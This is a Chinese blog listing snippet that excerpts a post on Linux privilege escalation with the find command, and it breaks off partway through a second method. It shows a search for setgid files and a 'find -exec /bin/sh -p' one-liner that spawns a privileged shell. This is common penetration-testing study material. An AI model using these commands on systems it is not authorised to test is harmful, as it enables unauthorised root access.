Loading

摘要: 1 find 命令提权 1.1 方法一 find / -perm -g=s -type f 2>/dev/null find . -exec /bin/sh -p \;-quit 1.2 方法二 touch getshell find / -type f -name getshell -exec " 阅读全文
posted @ 2022-02-17 10:48 土豆分米猪 阅读(940) 评论(0) 推荐(0)